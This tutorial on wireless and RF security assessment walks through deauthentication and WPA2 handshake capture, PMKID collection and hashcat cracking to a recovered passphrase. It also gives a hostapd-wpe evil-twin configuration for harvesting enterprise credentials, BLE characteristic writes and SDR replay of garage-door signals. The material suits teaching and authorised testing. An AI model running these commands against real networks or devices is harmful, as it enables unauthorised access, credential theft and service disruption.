Wireless Security Assessment and RF Analysis
802.11 Frame Structure and Encryption Evolution
Wireless networks operate using IEEE 802.11 frames that differ fundamentally from Ethernet. Management frames (beacons, probes, authentication, association) are sent unencrypted and, unless 802.11w Protected Management Frames (PMF) are negotiated, unauthenticated, a design weakness that enables numerous attacks. Data frames carry payload traffic, while control frames (ACK, RTS/CTS) coordinate medium access.
WEP (Wired Equivalent Privacy) relied on RC4 with a 24-bit initialization vector (IV), producing keystream reuse that led to practical statistical attacks. WPA/WPA2 introduced TKIP (now deprecated) and AES-CCMP, using a four-way handshake to derive session keys from the Pairwise Master Key (PMK). WPA3 replaces PSK authentication with Simultaneous Authentication of Equals (SAE), a password-authenticated key exchange resistant to offline dictionary attacks. SAE uses a commit-exchange protocol where both parties derive shared secrets without transmitting the password equivalent. Current practical attacks against WPA3-SAE remain limited to side-channel leaks in early implementations (Dragonblood vulnerabilities) and downgrade attacks where WPA3-Transition mode permits WPA2 connections.
Hardware Requirements: Adapter Chipsets and Driver Considerations
Successful wireless assessment demands compatible hardware. Monitor mode and frame injection require explicit driver support, often absent in consumer adapters.
| Chipset | Monitor Mode | Injection | Notes |
|---|---|---|---|
| RTL8187L (Realtek) | Yes | Yes | Legacy, stable, limited to 802.11g |
| AR9271 (Atheros) | Yes | Yes | Excellent Linux support via ath9k_htc |
| MT76xx (MediaTek) | Yes | Partial | Modern AC chips; monitor mode via mt76 driver |
| RTL88XXAU (Realtek) | Conditional | Conditional | Requires aircrack-ng/rtl8812au out-of-tree driver |
Verify capabilities before deployment:
```bash
# Check loaded driver and interface capabilities
iw list | grep -A 20 "Supported interface modes"
iw list | grep -A 10 "packet injection"
# Test injection with aireplay-ng
sudo aireplay-ng -9 wlan0mon
```
USB3 enclosures with external antenna connectors (Alfa AWUS036ACH with MT7612U, Alfa AWUS036NHA with AR9271) provide superior range and flexibility.
Aircrack-ng Suite: Capture and Analysis Workflow
The Aircrack-ng suite remains the foundational toolkit. A typical WPA2-PSK assessment proceeds through interface preparation, target identification, handshake capture, and offline cracking.
Enable monitor mode:
```bash
# Terminate interfering processes
sudo airmon-ng check kill
# Create monitor interface
sudo airmon-ng start wlan0
# Resulting interface typically wlan0mon
```
Discover targets and capture handshake:
```bash
# Channel-hop and list networks
sudo airodump-ng wlan0mon
# Lock to target channel and write the capture to file (deauthentication is sent separately below)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# In separate terminal: force handshake renegotiation
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
```
The four-way handshake comprises four messages (M1-M4) between authenticator and supplicant. M1 carries the Authenticator Nonce (ANonce); M2 carries the Supplicant Nonce (SNonce) and a MIC; M3 confirms key installation; M4 completes the exchange. Because the PMK is derived from the passphrase and SSID alone, M1 and M2 (or M2 and M3) are enough to recompute the PTK and check a passphrase guess against the captured MIC. Airodump-ng shows "WPA handshake: AA:BB:CC:DD:EE:FF" in the top-right of its display once one has been captured.
PMKID attack vector (no client required): the PMKID KDE in the RSN key data of the first EAPOL-Key message (M1) carries PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA), so a single AP-sent frame suffices for offline guessing. Tools like hcxdumptool can request and capture this directly:
```bash
# Install hcxtools
sudo apt install hcxtools
# Passive or active PMKID collection
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
# Extract for hashcat
hcxpcapngtool -o hash.txt -E essidlist pmkid.pcapng
```
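The key derivations behind the handshake and PMKID sections above, as an added Python example that is not part of the original page: PMK from passphrase and SSID, the PMKID tag, PTK/KCK expansion from the two nonces, and the EAPOL MIC check that makes M1+M2 sufficient. The MACs and passphrase come from the worked example later on the page; the nonces and the M2 frame are constructed here, not captured.

```python
import hashlib
import hmac

def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    # WPA2-Personal PMK (the PSK): PBKDF2-HMAC-SHA1, 4096 rounds, 256 bits
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA): first 16 bytes of the tag
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]

def prf_sha1(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter) blocks
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]

def kck_from_handshake(pmk, ap_mac, sta_mac, anonce, snonce):
    # PTK (384 bits for CCMP) from PMK, both MACs and both nonces; the KCK is its first 128 bits
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_sha1(pmk, b"Pairwise key expansion", data, 48)[:16]

def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    # EAPOL-Key MIC (descriptor version 2, HMAC-SHA1-128) over the frame with its MIC field (bytes 81..96) zeroed
    return hmac.new(kck, eapol[:81] + bytes(16) + eapol[97:], hashlib.sha1).digest()[:16]

def passphrase_matches(candidate, ssid, ap_mac, sta_mac, anonce, m2):
    # Validates one candidate against captured M1 (ANonce) and M2 (SNonce + MIC), as an offline cracker does
    snonce = m2[17:49]
    kck = kck_from_handshake(wpa2_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
    return hmac.compare_digest(eapol_mic(kck, m2), m2[81:97])

def build_m2(kck: bytes, snonce: bytes, key_data: bytes) -> bytes:
    # Constructed M2 (not a captured frame): EAPOL v2 type 3, key-info 0x010a = Pairwise|MIC|descriptor v2
    body = b"\x02\x01\x0a\x00\x10" + bytes(8) + snonce + bytes(16) + bytes(8) + bytes(8)
    body += bytes(16) + len(key_data).to_bytes(2, "big") + key_data
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body
    return frame[:81] + eapol_mic(kck, frame) + frame[97:]

if __name__ == "__main__":
    ap, sta = bytes.fromhex("aabbcc112233"), bytes.fromhex("001122334455")  # MACs from the worked example
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))                 # constructed nonces
    pmk = wpa2_pmk("Summer2024!", "CorpNet-Guest")
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # generic WPA2-PSK/CCMP RSN IE
    m2 = build_m2(kck_from_handshake(pmk, ap, sta, anonce, snonce), snonce, rsn_ie)
    print(passphrase_matches("Summer2024!", "CorpNet-Guest", ap, sta, anonce, m2))  # True
    print(passphrase_matches("password1", "CorpNet-Guest", ap, sta, anonce, m2))    # False
```

The PBKDF2 step dominates the cost of every guess, which is why the hashcat figures later on the page are in the tens or hundreds of kH/s rather than the GH/s seen for raw hashes.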
Complete Worked Example: WPA2-PSK Assessment to Cracked Passphrase
Step 1: Verify adapter and establish monitor mode
```bash
$ lsusb | grep -i wireless
Bus 001 Device 003: ID 0cf3:9271 Atheros Communications, Inc. AR9271 802.11n
$ sudo airmon-ng start wlan0
Interface wlan0mon was placed in monitor mode on channel 1
```
Step 2: Identify target network
```bash
$ sudo airodump-ng wlan0mon
BSSID              PWR  Beacons  CH  ENC   CIPHER  AUTH  ESSID
AA:BB:CC:11:22:33  -42  1254     6   WPA2  CCMP    PSK   CorpNet-Guest
```
Step 3: Capture handshake with targeted deauthentication
```bash
# Terminal 1: focused capture
$ sudo airodump-ng -c 6 --bssid AA:BB:CC:11:22:33 -w corpnet_handshake wlan0mon
# Terminal 2: 5 rounds of directed deauthentication (64 frames each) at one client
$ sudo aireplay-ng -0 5 -a AA:BB:CC:11:22:33 -c 00:11:22:33:44:55 wlan0mon
12:34:56 Waiting for beacon frame...
12:34:58 Sending 64 directed DeAuth...
12:35:01 Authentication from 00:11:22:33:44:55...
12:35:02 WPA handshake: AA:BB:CC:11:22:33 [Captured]
```
Step 4: Verify and convert capture
```bash
$ aircrack-ng corpnet_handshake-01.cap
Reading packets, please wait...
   #  BSSID              ESSID          Encryption
   1  AA:BB:CC:11:22:33  CorpNet-Guest  WPA (1 handshake)
$ hcxpcapngtool -o corpnet_hash.hc22000 corpnet_handshake-01.cap
```
Step 5: Hashcat dictionary attack with rules
```bash
# Benchmark RTX 3070: ~650 kH/s WPA2
$ hashcat -m 22000 corpnet_hash.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Realistic timing for 8-character password with complex rules: 4-72 hours
# For demonstration with known-weak password:
$ echo "Summer2024!" > candidate.txt
$ hashcat -m 22000 corpnet_hash.hc22000 candidate.txt
corpnet_hash.hc22000:Summer2024!
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Time.Started.....: Thu Jan 15 14:32:01 2024 (0 secs)
Speed.#1.........: 63499 H/s
Recovered........: 1/1 (100.00%)
```
WPA-Enterprise Attacks: Evil Twin with Hostapd-WPE
WPA-Enterprise (802.1X) networks using PEAP or EAP-TTLS transmit credential material in tunneled TLS. The Hostapd-WPE (Wireless Pwnage Edition) patch creates a rogue RADIUS server and access point that harvests MSCHAPv2 challenge-response pairs.
```bash
# Configure hostapd-wpe for target SSID "Corp-802.1X"
cat > hostapd-wpe.conf << 'EOF'
interface=wlan0mon
driver=nl80211
ssid=Corp-802.1X
channel=1
ieee8021x=1
eapol_version=2
wpa=2
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=secret
EOF
sudo hostapd-wpe hostapd-wpe.conf
```
Clients connecting to the evil twin are presented with the rogue server's self-signed certificate, which supplicants configured without CA validation (or with validation disabled) accept silently. Hostapd-WPE logs the MSCHAPv2 challenge-response pair, which can be cracked with asleap or john --format=netntlm using a wordlist, or submitted to cloud cracking services for GPU-accelerated attacks. Certificate pinning and strict CA validation on client supplicants (a specific trusted CA plus a check of the expected server name) mitigate this vector.
Bluetooth and BLE Assessment
BlueZ provides the Linux Bluetooth stack. For Low Energy (BLE) reconnaissance and attacks, Bettercap offers integrated capabilities:
```bash
# BLE device discovery
sudo bettercap -eval "ble.recon on; ble.show"
# Enumerate services and characteristics
ble.enum AA:BB:CC:DD:EE:FF
# Read/write characteristics for fuzzing
ble.write AA:BB:CC:DD:EE:FF 0x0021 deadbeef
```
Bettercap's ble.recon module passively scans advertisement channels (37, 38, 39) detecting connectable and non-connectable broadcasts. Common BLE vulnerabilities include hardcoded credentials in characteristic values, missing pairing requirements, and replayable authentication tokens.
Software-Defined Radio for Broader RF Security
Beyond 802.11, the electromagnetic spectrum contains numerous unencrypted or weakly secured protocols. RTL-SDR dongles ($20-40, R820T2/Rafael Micro tuner) with GNU Radio enable reception from 24 MHz to 1.7 GHz.
| Target | Frequency | Common Protocol | Security Issues |
|---|---|---|---|
| Garage door openers | 300-433 MHz | Fixed code, rolling code | Replay attacks, de Bruijn sequences |
| Vehicle key fobs | 315/433/868 MHz | KeeLoq, HiTag2 | Rolljam attacks, cryptanalysis |
| Industrial telemetry | 900 MHz/2.4 GHz | WirelessHART, ISA100 | No encryption, spoofing |
| Pagers | 150 MHz | POCSAG | Unencrypted message broadcast |
Example: Capturing and replaying a fixed-code garage door signal:
```bash
# Record raw IQ samples at 433.92 MHz for later analysis in GNU Radio
rtl_sdr -f 433920000 -s 2048000 -g 40 garage_door.raw
# Or AM-demodulate directly (rtl_fm reads from the dongle itself, not from stdin) and save as WAV
rtl_fm -M am -f 433920000 -s 200000 -g 40 - | \
sox -t raw -r 200000 -e signed -b 16 -c 1 - garage_door.wav
# Replay with transmit-capable SDR (HackRF, Yard Stick One)
rfcat -r -f 433920000 -m ASK_OOK -s garage_door.raw
```
Rolling-code implementations (KeeLoq, HCS301) require synchronized capture and immediate replay before the legitimate transmitter increments the counter. The Rolljam attack (Samy Kamkar) captures the signal, jams the receiver, and replays the captured code on demand while storing the subsequent code for future use.
SDR assessment demands regulatory awareness: transmission in licensed bands without authorization violates telecommunications regulations in most jurisdictions. Passive reception generally remains legal but verify local laws before deployment.